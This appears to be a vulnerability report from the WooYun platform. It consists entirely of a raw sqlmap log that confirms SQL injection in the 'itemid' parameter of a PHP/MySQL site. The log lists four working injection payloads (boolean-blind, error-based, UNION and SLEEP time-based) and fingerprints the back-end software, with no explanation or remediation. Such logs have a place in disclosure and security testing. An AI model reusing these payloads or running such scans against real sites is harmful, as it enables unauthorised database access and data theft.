WooYun.org

[10:07:16] [INFO] testing connection to the target URL
[10:07:17] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[10:07:18] [INFO] target URL is stable
[10:07:18] [INFO] testing if GET parameter 'itemid' is dynamic
[10:07:18] [INFO] confirming that GET parameter 'itemid' is dynamic
[10:07:18] [INFO] GET parameter 'itemid' is dynamic
[10:07:19] [INFO] heuristic (basic) test shows that GET parameter 'itemid' might
 be injectable (possible DBMS: 'MySQL')
[10:07:19] [INFO] testing for SQL injection on GET parameter 'itemid'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you
want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'MySQL' extending provided level (1) and ri
sk (1) values? [Y/n]
[10:07:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:07:21] [WARNING] reflective value(s) found and filtering out
[10:07:22] [INFO] GET parameter 'itemid' seems to be 'AND boolean-based blind -
WHERE or HAVING clause' injectable
[10:07:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[10:07:22] [INFO] GET parameter 'itemid' is 'MySQL >= 5.0 AND error-based - WHER
E or HAVING clause' injectable
[10:07:22] [INFO] testing 'MySQL inline queries'
[10:07:23] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:07:23] [WARNING] time-based comparison requires larger statistical model, pl
ease wait..................
[10:07:26] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:07:26] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:07:37] [INFO] GET parameter 'itemid' seems to be 'MySQL > 5.0.11 AND time-ba
sed blind' injectable
[10:07:37] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[10:07:37] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[10:07:37] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[10:07:38] [INFO] target URL appears to have 5 columns in query
[10:07:40] [INFO] GET parameter 'itemid' is 'MySQL UNION query (NULL) - 1 to 20
columns' injectable
GET parameter 'itemid' is vulnerable. Do you want to keep testing the others (if
 any)? [y/N]
sqlmap identified the following injection points with a total of 40 HTTP(s) requ
ests:
---
Parameter: itemid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: itemid=455 AND 2922=2922&page=01
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: itemid=455 AND (SELECT 1959 FROM(SELECT COUNT(*),CONCAT(0x71627a767
1,(SELECT (CASE WHEN (1959=1959) THEN 1 ELSE 0 END)),0x716a627171,FLOOR(RAND(0)*
2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&page=01
    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: itemid=455 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7671,0x477a427
148656c74436d,0x716a627171),NULL,NULL#&page=01
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: itemid=455 AND SLEEP(5)&page=01
---
[10:07:44] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.29, Apache 2
back-end DBMS: MySQL 5.0